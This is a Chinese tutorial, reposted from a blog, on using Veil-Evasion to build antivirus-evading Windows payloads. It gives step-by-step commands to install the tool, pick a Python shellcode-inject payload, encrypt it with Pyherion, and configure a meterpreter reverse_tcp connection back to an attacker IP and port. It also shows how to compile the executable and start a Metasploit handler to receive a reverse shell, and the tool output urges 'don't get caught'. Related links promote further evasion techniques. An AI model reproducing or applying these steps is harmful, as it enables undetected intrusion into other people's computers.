veil-Evasion免杀使用
Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载:
git clone [https://www.github.com/Veil-Framework/Veil-Evasion.git
下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令:
ls cd Veil-Evasion/ ls cd setup/ ls ./setup.sh
当安装至如下位置时,会询问我们是否继续安装,我们输入 Y 继续
此时跳出 python for windows 的安装界面,我们点击 next 即可。
点击 next 选择 yes 继续安装。
这里安装 pywin32-219 我们直接 下一步。
安装 ruby 环境,我们选择 accept ,并 next 。安装 ruby 环境,我们选择 accept ,并 next 。
这里我们全选中复选框,并点击 install 开始安装! 这里我们全选中复选框,并点击 install 开始安装
在以上一系列繁杂的安装过程后下面我们就可以来正常使用 Veil-Evasion 啦!我们进入到Veil-Evasion目录下,执行如下命令:
成功进入到菜单界面,可以看到当前一共有 51 种 payload 可用!我们可以使用 list 命令来查看 payload 的详细信息!根据 payload 编号,这里我选择 35号的 python payload进行演示
在这个界面,我们可以对该 payload 进行一些基本的配置。例如:编译后生成文件的格式有效期,并是否进行加密做出配置。这里我选择使用 pyherion 进行加密
set USE_PYHERIONYgenerate (生成payload)
这个界面要求我们,选择一种生成 shellcode 的模板文件。我们就按照默认的选择 msfvenom 1 。
IP :192.168.5.7 PORT :4444
这个界面要求我们,对生成的 payload 进行命名和可执行性的编译。我随便命名为 vir 并选择 免杀效果更好的第 2种方式进行编译
成功完成以上编译后,编译后的文件被保存在 /usr/share/veil-output/compiled/vir.exe下。
[*] Executable written to: /usr/share/veil-output/compiled/ir.exe Language: python Payload: python/shellcode_inject/aes_encrypt Shellcode: windows/meterpreter/reverse_tcp Options: LHOST=192.168.40.128 LPROT=4444 Required Options: COMPILE_TO_EXE+Y EXPIRE_PAYLOAD=X INJECT_METHOD+Virtual USE_PYHERIOD=Y Payload File: /usr/share/veil-output/source/fujieace.py Handler File: /usr/share/veil-output/handlers/fujieace_handler.rc [*] Your payload files have been generated,don't get caught! [*] And don't submit samples to any online scanner!
同时新生成的 shellcode 的 rc 文件也被保存在了 veil-output下的 handlers目录下!既然有了 rc 文件,那么我们就可以方便的利用 MSF 进行调用了!
msfconsole -r vir_handler.rc
此时当目标系统上成功运行我们生成的 shellcode 后,我们将在 kali 上取得目标系统的反弹shell 。
转载于:https://www.cnblogs.com/-qing-/p/11031699.html
veil-Evasion免杀使用相关推荐
- Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...
- Veil+tdm-gcc免杀360火绒瑞星
Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避 ...
- Cobalt Strike Veil 免杀过杀软(子篇10)
1.Veil的使用 Veil主要用于免杀payload 安装过程 https://www.veil-framework.com/ https://github.com/Veil-Framework/V ...
- Veil框架工具使用(免杀Payload生成工具)
目录 介绍 下载 GIthub下载 命令行下载 veil 生成免杀 payload 使用 payload 进行渗透攻击
- 远控免杀专题(67)-白名单(113个)总结篇
关于白名单程序 相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称"Living-Off-the-Land Binaries",直白翻译 ...
- 远控免杀从入门到实践之白名单(113个)总结篇
郑重声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! <远控免杀从入门到实践>系列文章目录: 1.远控免杀从入 ...
- 【kali-漏洞利用】(3.4)免杀Payload 生成工具(下):Veil后门使用、监听失败原因
目录 一.veil使用 1.1.启动: 1.2.分类 1.3.利用msf测试 启动: 利用模块: 1.4.免杀payload被运行 win7 winxp 1.5.结果 1.6.错误: 一.veil使用 ...
- 162.网络安全渗透测试—[Cobalt Strike系列]—[Veil免杀]
文章目录 1 Veil的使用 2 生成有效载荷payload 3 Veil免杀过程 4 测试免杀 1 Veil的使用 (1)Veil主要用于生成:免杀payload (2)下载地址:https://g ...
- Kail Linux渗透测试教程之免杀Payload生成工具Veil
Kail Linux渗透测试教程之免杀Payload生成工具Veil 免杀Payload生成工具--Veil Kail Linux渗透测试教程之免杀Payload生成工具Veil,Veil是一款利用M ...
- 迁移Veil:手工打造Windows下编译的免杀Payload
作者:RedFree 本文转自乌云 Veil对Payload的免杀已经做的很好了,最新的Veil有39个可用的Payload.但是有时候需要使用Windows来完成所有的渗透测试工作,Linux和Wi ...
最新文章
- grub shell 错误_GRUB启动故障排除和内核编译
- 修改Git提交者昵称和邮箱
- ubuntu账号设置root_Ubuntu设置root用户,以及开启Ubuntu的ssh连接,更改apt-get源
- sql注入pythonpoco_.NET EF(Entity Framework)详解
- 以编程方式向OpenJPA注册实体类型
- Java io流---拷贝文件夹下的所有文件和目录
- Java构造方法的继承调用
- 21个TensorFlow项目转换tfrecord:TypeError: 'RGB' has type str, but expected one of: bytes(法二)
- linux强行退出线程,Linux 多线程编程--线程退出
- linux脚本无法执行命令,shell脚本在Windows下能执行,而Linux不能执行的原因及解决...
- Input鼠标键盘输入
- 企业微信第三方应用开发
- Java 多线程设计模式
- 1466:Girls and Boys:优美的拆散早恋学生?
- 京东历史价格查询的方法是?
- Dev c++ 怎么设置背景色
- ios 调试工具FLEX
- mac php fpm 启动,mac 启动php-fpm
- Linux下/etc/mdev.conf学习
- Spark学习之路 (三)Spark之RDD